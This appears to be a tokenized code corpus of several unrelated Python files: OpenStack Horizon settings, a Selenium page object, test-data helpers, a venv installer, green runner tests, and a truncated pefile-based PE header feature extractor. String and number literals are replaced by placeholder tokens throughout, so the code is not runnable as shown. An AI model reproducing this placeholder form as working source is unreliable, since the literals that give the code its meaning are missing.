'<STR_LIT>' <EOL> STATIC_ROOT = os . path . abspath ( os . path . join ( ROOT_PATH , '<STR_LIT:..>' , '<STR_LIT>' ) ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> HORIZON_CONFIG = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { '<STR_LIT>' : exceptions . RECOVERABLE , <EOL> '<STR_LIT>' : exceptions . NOT_FOUND , <EOL> '<STR_LIT>' : exceptions . UNAUTHORIZED } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> HORIZON_IMAGES_ALLOW_UPLOAD = True <EOL> OPENSTACK_IMAGE_BACKEND = { <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) <EOL> ] <EOL> } <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( ROOT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> STATICFILES_DIRS = [ <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . angular ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . angular_cookies ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . angular_mock ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . bootstrap_datepicker ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . bootstrap_scss ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . d3 ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . hogan ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . font_awesome ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jasmine ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery_migrate ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery_quicksearch ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery_tablesorter ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jsencrypt ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . qunit ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . rickshaw ) . base_dir ) , <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . spin ) . base_dir ) , <EOL> ] <EOL> if xstatic . main . XStatic ( xstatic . pkg . jquery_ui ) . version . startswith ( '<STR_LIT>' ) : <EOL> STATICFILES_DIRS . append ( <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery_ui ) . base_dir ) ) <EOL> else : <EOL> STATICFILES_DIRS . append ( <EOL> ( '<STR_LIT>' , <EOL> xstatic . main . XStatic ( xstatic . pkg . jquery_ui ) . base_dir ) ) <EOL> COMPRESS_PRECOMPILERS = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> COMPRESS_CSS_FILTERS = ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> COMPRESS_ENABLED = True <EOL> COMPRESS_OUTPUT_DIR = '<STR_LIT>' <EOL> COMPRESS_CSS_HASHING_METHOD = '<STR_LIT>' <EOL> COMPRESS_PARSER = '<STR_LIT>' <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> TEST_RUNNER = '<STR_LIT>' <EOL> AUTHENTICATION_BACKENDS = ( '<STR_LIT>' , ) <EOL> MESSAGE_STORAGE = '<STR_LIT>' <EOL> SESSION_ENGINE = '<STR_LIT>' <EOL> SESSION_COOKIE_HTTPONLY = True <EOL> SESSION_EXPIRE_AT_BROWSER_CLOSE = True <EOL> SESSION_COOKIE_SECURE = False <EOL> SESSION_TIMEOUT = <NUM_LIT> <EOL> TOKEN_TIMEOUT_MARGIN = <NUM_LIT:10> <EOL> SESSION_COOKIE_MAX_SIZE = <NUM_LIT> <EOL> SESSION_SERIALIZER = '<STR_LIT>' <EOL> LANGUAGES = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> LANGUAGE_COOKIE_NAME = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> OPENSTACK_KEYSTONE_DEFAULT_ROLE = '<STR_LIT>' <EOL> DEFAULT_EXCEPTION_REPORTER_FILTER = '<STR_LIT>' <EOL> POLICY_FILES_PATH = os . path . join ( ROOT_PATH , "<STR_LIT>" ) <EOL> POLICY_FILES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:image>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> SECRET_KEY = None <EOL> LOCAL_PATH = None <EOL> SECURITY_GROUP_RULES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } <EOL> try : <EOL> from local . local_settings import * <EOL> except ImportError : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> import openstack_dashboard . enabled <EOL> import openstack_dashboard . local . enabled <EOL> from openstack_dashboard . utils import settings <EOL> INSTALLED_APPS = list ( INSTALLED_APPS ) <EOL> settings . update_dashboards ( [ <EOL> openstack_dashboard . enabled , <EOL> openstack_dashboard . local . enabled , <EOL> ] , HORIZON_CONFIG , INSTALLED_APPS ) <EOL> if not SECRET_KEY : <EOL> if not LOCAL_PATH : <EOL> LOCAL_PATH = os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , <EOL> '<STR_LIT>' ) <EOL> from horizon . utils import secret_key <EOL> SECRET_KEY = secret_key . generate_or_read_from_file ( os . path . join ( LOCAL_PATH , <EOL> '<STR_LIT>' ) ) <EOL> from openstack_dashboard import policy <EOL> POLICY_CHECK_FUNCTION = policy . check <EOL> COMPRESS_OFFLINE_CONTEXT = { <EOL> '<STR_LIT>' : STATIC_URL , <EOL> '<STR_LIT>' : HORIZON_CONFIG <EOL> } <EOL> if DEBUG : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> from openstack_auth import utils as auth_utils <EOL> auth_utils . patch_middleware_get_user ( ) </s>
<s> from selenium . webdriver . common import by <EOL> from openstack_dashboard . test . integration_tests . pages import basepage <EOL> from openstack_dashboard . test . integration_tests . pages . settings import changepasswordpage <EOL> from openstack_dashboard . test . integration_tests . regions import forms <EOL> class UsersettingsPage ( basepage . BaseNavigationPage ) : <EOL> DEFAULT_LANGUAGE = "<STR_LIT>" <EOL> DEFAULT_TIMEZONE = "<STR_LIT>" <EOL> DEFAULT_PAGESIZE = "<STR_LIT>" <EOL> DEFAULT_SETTINGS = { <EOL> "<STR_LIT>" : DEFAULT_LANGUAGE , <EOL> "<STR_LIT>" : DEFAULT_TIMEZONE , <EOL> "<STR_LIT>" : DEFAULT_PAGESIZE <EOL> } <EOL> SETTINGS_FORM_FIELDS = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> _settings_form_locator = ( by . By . CSS_SELECTOR , '<STR_LIT>' ) <EOL> _change_password_tab_locator = ( by . By . CSS_SELECTOR , <EOL> '<STR_LIT>' ) <EOL> def __init__ ( self , driver , conf ) : <EOL> super ( UsersettingsPage , self ) . __init__ ( driver , conf ) <EOL> self . _page_title = "<STR_LIT>" <EOL> @ property <EOL> def settings_form ( self ) : <EOL> src_elem = self . _get_element ( * self . _settings_form_locator ) <EOL> return forms . FormRegion ( self . driver , self . conf , src_elem , <EOL> self . SETTINGS_FORM_FIELDS ) <EOL> @ property <EOL> def changepassword ( self ) : <EOL> return changepasswordpage . ChangePasswordPage ( self . driver , self . conf ) <EOL> @ property <EOL> def change_password_tab ( self ) : <EOL> return self . _get_element ( * self . _change_password_tab_locator ) <EOL> def change_language ( self , lang = DEFAULT_LANGUAGE ) : <EOL> self . settings_form . language . value = lang <EOL> self . settings_form . submit . click ( ) <EOL> def change_timezone ( self , timezone = DEFAULT_TIMEZONE ) : <EOL> self . settings_form . timezone . value = timezone <EOL> self . settings_form . submit . click ( ) <EOL> def change_pagesize ( self , size = DEFAULT_PAGESIZE ) : <EOL> self . settings_form . pagesize . value = size <EOL> self . settings_form . submit . click ( ) <EOL> def return_to_default_settings ( self ) : <EOL> self . change_language ( ) <EOL> self . change_timezone ( ) <EOL> self . change_pagesize ( ) <EOL> def go_to_change_password_page ( self ) : <EOL> self . change_password_tab . click ( ) <EOL> return changepasswordpage . ChangePasswordPage ( self . driver , self . conf ) </s>
<s> def load_test_data ( load_onto = None ) : <EOL> from openstack_dashboard . test . test_data import ceilometer_data <EOL> from openstack_dashboard . test . test_data import cinder_data <EOL> from openstack_dashboard . test . test_data import exceptions <EOL> from openstack_dashboard . test . test_data import glance_data <EOL> from openstack_dashboard . test . test_data import heat_data <EOL> from openstack_dashboard . test . test_data import keystone_data <EOL> from openstack_dashboard . test . test_data import neutron_data <EOL> from openstack_dashboard . test . test_data import nova_data <EOL> from openstack_dashboard . test . test_data import sahara_data <EOL> from openstack_dashboard . test . test_data import swift_data <EOL> from openstack_dashboard . test . test_data import trove_data <EOL> loaders = ( <EOL> exceptions . data , <EOL> keystone_data . data , <EOL> glance_data . data , <EOL> nova_data . data , <EOL> cinder_data . data , <EOL> neutron_data . data , <EOL> swift_data . data , <EOL> heat_data . data , <EOL> ceilometer_data . data , <EOL> trove_data . data , <EOL> sahara_data . data , <EOL> ) <EOL> if load_onto : <EOL> for data_func in loaders : <EOL> data_func ( load_onto ) <EOL> return load_onto <EOL> else : <EOL> return TestData ( * loaders ) <EOL> class TestData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> for data_func in args : <EOL> data_func ( self ) <EOL> class TestDataContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _objects = [ ] <EOL> def add ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> for obj in args : <EOL> if obj not in self . _objects : <EOL> self . _objects . append ( obj ) <EOL> def list ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects <EOL> def filter ( self , filtered = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if filtered is None : <EOL> filtered = self . _objects <EOL> try : <EOL> key , value = kwargs . popitem ( ) <EOL> except KeyError : <EOL> return filtered <EOL> def get_match ( obj ) : <EOL> return hasattr ( obj , key ) and getattr ( obj , key ) == value <EOL> return self . filter ( filtered = filter ( get_match , filtered ) , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> matches = self . filter ( ** kwargs ) <EOL> if not matches : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> return matches . pop ( ) <EOL> def first ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects [ <NUM_LIT:0> ] <EOL> def count ( self ) : <EOL> return len ( self . _objects ) </s>
<s> import os <EOL> import sys <EOL> import install_venv_common as install_venv <EOL> def print_help ( venv , root ) : <EOL> help = """<STR_LIT>""" <EOL> print ( help % ( venv , root ) ) <EOL> def main ( argv ) : <EOL> root = os . path . dirname ( os . path . dirname ( os . path . realpath ( __file__ ) ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> root = os . environ [ '<STR_LIT>' ] <EOL> venv = os . path . join ( root , '<STR_LIT>' ) <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> venv = os . environ [ '<STR_LIT>' ] <EOL> pip_requires = os . path . join ( root , '<STR_LIT>' ) <EOL> test_requires = os . path . join ( root , '<STR_LIT>' ) <EOL> py_version = "<STR_LIT>" % ( sys . version_info [ <NUM_LIT:0> ] , sys . version_info [ <NUM_LIT:1> ] ) <EOL> project = '<STR_LIT>' <EOL> install = install_venv . InstallVenv ( root , venv , pip_requires , test_requires , <EOL> py_version , project ) <EOL> options = install . parse_args ( argv ) <EOL> install . check_python_version ( ) <EOL> install . check_dependencies ( ) <EOL> install . create_virtualenv ( no_site_packages = options . no_site_packages ) <EOL> install . install_dependencies ( ) <EOL> print_help ( venv , root ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( sys . argv ) </s>
<s> from esri2open import toOpen , writeFile , closeUp , closeJSON <EOL> from prepare import prepareFile , prepareGeoJSON </s>
<s> from __future__ import unicode_literals <EOL> from argparse import Namespace <EOL> try : <EOL> from io import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> import sys <EOL> import unittest <EOL> try : <EOL> from unittest . mock import MagicMock , patch <EOL> except : <EOL> from mock import MagicMock , patch <EOL> from green import djangorunner <EOL> from green . config import mergeConfig <EOL> class TestDjangoMissing ( unittest . TestCase ) : <EOL> def test_importError ( self ) : <EOL> self . assertRaises ( ImportError , djangorunner . django_missing ) <EOL> class TestDjangoRunner ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> try : <EOL> djangorunner . DjangoRunner ( ) <EOL> except ImportError : <EOL> raise unittest . SkipTest ( "<STR_LIT>" ) <EOL> saved_stdout = sys . stdout <EOL> self . stream = StringIO ( ) <EOL> sys . stdout = self . stream <EOL> self . addCleanup ( setattr , sys , '<STR_LIT>' , saved_stdout ) <EOL> def test_run_testsWithLabel ( self ) : <EOL> dr = djangorunner . DjangoRunner ( ) <EOL> dr . setup_test_environment = MagicMock ( ) <EOL> dr . setup_databases = MagicMock ( ) <EOL> dr . teardown_databases = MagicMock ( ) <EOL> dr . teardown_test_environment = MagicMock ( ) <EOL> dr . run_tests ( ( '<STR_LIT>' , ) , testing = True ) <EOL> self . assertIn ( '<STR_LIT:OK>' , self . stream . getvalue ( ) ) <EOL> def test_run_testsWithoutLabel ( self ) : <EOL> """<STR_LIT>""" <EOL> dr = djangorunner . DjangoRunner ( ) <EOL> dr . setup_test_environment = MagicMock ( ) <EOL> dr . setup_databases = MagicMock ( ) <EOL> dr . teardown_databases = MagicMock ( ) <EOL> dr . teardown_test_environment = MagicMock ( ) <EOL> saved_loadTargets = djangorunner . loadTargets <EOL> djangorunner . loadTargets = MagicMock ( ) <EOL> self . addCleanup ( setattr , djangorunner , '<STR_LIT>' , saved_loadTargets ) <EOL> dr . run_tests ( ( ) , testing = True ) <EOL> djangorunner . loadTargets . assert_called_with ( [ '<STR_LIT:.>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . stream . getvalue ( ) ) <EOL> def test_run_testsWithBadInput ( self ) : <EOL> """<STR_LIT>""" <EOL> dr = djangorunner . DjangoRunner ( ) <EOL> dr . setup_test_environment = MagicMock ( ) <EOL> dr . setup_databases = MagicMock ( ) <EOL> self . assertRaises ( ValueError , dr . run_tests , None , True ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run_noTests ( self , mock_loadTargets , mock_run , mock_GreenTestSuite ) : <EOL> """<STR_LIT>""" <EOL> dr = djangorunner . DjangoRunner ( ) <EOL> dr . setup_test_environment = MagicMock ( ) <EOL> dr . setup_databases = MagicMock ( ) <EOL> dr . teardown_databases = MagicMock ( ) <EOL> dr . teardown_test_environment = MagicMock ( ) <EOL> mock_loadTargets . return_value = None <EOL> mock_GreenTestSuite . return_value = <NUM_LIT> <EOL> dr . run_tests ( ( ) , testing = True ) <EOL> self . assertEqual ( mock_run . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run_coverage ( self , mock_loadTargets , mock_run , mock_GreenTestSuite , mock_mergeConfig ) : <EOL> """<STR_LIT>""" <EOL> args = mergeConfig ( Namespace ( ) ) <EOL> args . run_coverage = True <EOL> args . cov = MagicMock ( ) <EOL> mock_mergeConfig . return_value = args <EOL> dr = djangorunner . DjangoRunner ( ) <EOL> dr . setup_test_environment = MagicMock ( ) <EOL> dr . setup_databases = MagicMock ( ) <EOL> dr . teardown_databases = MagicMock ( ) <EOL> dr . teardown_test_environment = MagicMock ( ) <EOL> mock_loadTargets . return_value = None <EOL> mock_GreenTestSuite . return_value = <NUM_LIT> <EOL> dr . run_tests ( ( ) , testing = True ) <EOL> self . assertEqual ( mock_run . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <NUM_LIT> ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import pefile <EOL> class PEFileFeatures ( ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _dense_feature_list = None <EOL> self . _dense_features = None <EOL> self . _sparse_feature_list = None <EOL> self . _sparse_features = None <EOL> self . _verbose = False <EOL> self . _warnings = [ ] <EOL> self . set_dense_features ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . set_sparse_features ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def execute ( self , input_data ) : <EOL> '''<STR_LIT>''' <EOL> raw_bytes = input_data <EOL> pefile_handle , error_str = self . open_using_pefile ( '<STR_LIT>' , raw_bytes ) <EOL> if not pefile_handle : <EOL> return { '<STR_LIT:error>' : error_str } <EOL> return self . extract_features_using_pefile ( pefile_handle ) <EOL> def set_dense_features ( self , dense_feature_list ) : <EOL> '''<STR_LIT>''' <EOL> self . _dense_feature_list = dense_feature_list <EOL> def get_dense_features ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _dense_features <EOL> def set_sparse_features ( self , sparse_feature_list ) : <EOL> '''<STR_LIT>''' <EOL> self . _sparse_feature_list = sparse_feature_list <EOL> def get_sparse_features ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _sparse_features <EOL> def open_using_pefile ( self , input_name , input_bytes ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pe = pefile . PE ( data = input_bytes , fast_load = False ) <EOL> except Exception , error : <EOL> print '<STR_LIT>' % input_name <EOL> error_str = '<STR_LIT>' % ( str ( error ) ) <EOL> return None , error_str <EOL> if ( pe . PE_TYPE is None or pe . OPTIONAL_HEADER is None or len ( pe . OPTIONAL_HEADER . DATA_DIRECTORY ) < <NUM_LIT:7> ) : <EOL> print '<STR_LIT>' % input_name <EOL> error_str = '<STR_LIT>' % input_name <EOL> return None , error_str <EOL> return pe , None <EOL> def extract_features_using_pefile ( self , pe ) : <EOL> '''<STR_LIT>''' <EOL> extracted_dense = { } <EOL> extracted_sparse = { } <EOL> feature_not_found_flag = - <NUM_LIT> <EOL> feature_default_value = <NUM_LIT:0> <EOL> self . _warnings = [ ] <EOL> for feature in self . _dense_feature_list : <EOL> extracted_dense [ feature ] = feature_not_found_flag <EOL> for feature in self . _sparse_feature_list : <EOL> extracted_sparse [ feature ] = feature_not_found_flag <EOL> std_sections = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for i in range ( <NUM_LIT:200> ) : <EOL> std_sections . append ( '<STR_LIT:/>' + str ( i ) ) <EOL> std_section_names = <NUM_LIT:1> <EOL> extracted_sparse [ '<STR_LIT>' ] = [ ] <EOL> for section in pe . sections : <EOL> name = convertToAsciiNullTerm ( section . Name ) . lower ( ) <EOL> extracted_sparse [ '<STR_LIT>' ] . append ( name ) <EOL> if ( name not in std_sections ) : <EOL> std_section_names = <NUM_LIT:0> <EOL> extracted_dense [ '<STR_LIT>' ] = std_section_names <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . DATA_DIRECTORY [ <NUM_LIT:6> ] . Size <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . MajorImageVersion <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . MinorImageVersion <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . DATA_DIRECTORY [ <NUM_LIT:1> ] . VirtualAddress <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . DATA_DIRECTORY [ <NUM_LIT:0> ] . Size <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . CheckSum <EOL> try : <EOL> extracted_dense [ '<STR_LIT>' ] = pe . generate_checksum ( ) <EOL> except ValueError : <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if ( len ( pe . sections ) > <NUM_LIT:0> ) : <EOL> extracted_dense [ '<STR_LIT>' ] = pe . sections [ <NUM_LIT:0> ] . VirtualAddress <EOL> extracted_dense [ '<STR_LIT>' ] = pe . sections [ <NUM_LIT:0> ] . Misc_VirtualSize <EOL> extracted_dense [ '<STR_LIT>' ] = pe . FILE_HEADER . NumberOfSections <EOL> extracted_dense [ '<STR_LIT>' ] = pe . FILE_HEADER . TimeDateStamp <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . NumberOfRvaAndSizes <EOL> extracted_dense [ '<STR_LIT>' ] = len ( pe . __data__ ) <EOL> if hasattr ( pe , '<STR_LIT>' ) : <EOL> extracted_dense [ '<STR_LIT>' ] = len ( pe . DIRECTORY_ENTRY_IMPORT ) <EOL> num_imported_symbols = <NUM_LIT:0> <EOL> for module in pe . DIRECTORY_ENTRY_IMPORT : <EOL> num_imported_symbols += len ( module . imports ) <EOL> extracted_dense [ '<STR_LIT>' ] = num_imported_symbols <EOL> if hasattr ( pe , '<STR_LIT>' ) : <EOL> extracted_dense [ '<STR_LIT>' ] = len ( pe . DIRECTORY_ENTRY_BOUND_IMPORT ) <EOL> num_imported_symbols = <NUM_LIT:0> <EOL> for module in pe . DIRECTORY_ENTRY_BOUND_IMPORT : <EOL> num_imported_symbols += len ( module . entries ) <EOL> extracted_dense [ '<STR_LIT>' ] = num_imported_symbols <EOL> if hasattr ( pe , '<STR_LIT>' ) : <EOL> extracted_dense [ '<STR_LIT>' ] = len ( pe . DIRECTORY_ENTRY_EXPORT . symbols ) <EOL> symbol_set = set ( ) <EOL> for symbol in pe . DIRECTORY_ENTRY_EXPORT . symbols : <EOL> symbol_info = '<STR_LIT>' <EOL> if ( not symbol . name ) : <EOL> symbol_info = '<STR_LIT>' + str ( symbol . ordinal ) <EOL> else : <EOL> symbol_info = '<STR_LIT>' + symbol . name <EOL> symbol_set . add ( convertToUTF8 ( '<STR_LIT:%s>' % ( symbol_info ) ) . lower ( ) ) <EOL> extracted_sparse [ '<STR_LIT>' ] = list ( symbol_set ) <EOL> if hasattr ( pe , '<STR_LIT>' ) : <EOL> symbol_set = set ( ) <EOL> for module in pe . DIRECTORY_ENTRY_IMPORT : <EOL> for symbol in module . imports : <EOL> symbol_info = '<STR_LIT>' <EOL> if symbol . import_by_ordinal is True : <EOL> symbol_info = '<STR_LIT>' + str ( symbol . ordinal ) <EOL> else : <EOL> symbol_info = '<STR_LIT>' + symbol . name <EOL> if symbol . bound : <EOL> symbol_info += '<STR_LIT>' + str ( symbol . bound ) <EOL> symbol_set . add ( convertToUTF8 ( '<STR_LIT>' % ( module . dll , symbol_info ) ) . lower ( ) ) <EOL> extracted_sparse [ '<STR_LIT>' ] = list ( symbol_set ) <EOL> if ( len ( pe . sections ) >= <NUM_LIT:2> ) : <EOL> extracted_dense [ '<STR_LIT>' ] = pe . sections [ <NUM_LIT:1> ] . Misc_VirtualSize <EOL> extracted_dense [ '<STR_LIT>' ] = pe . 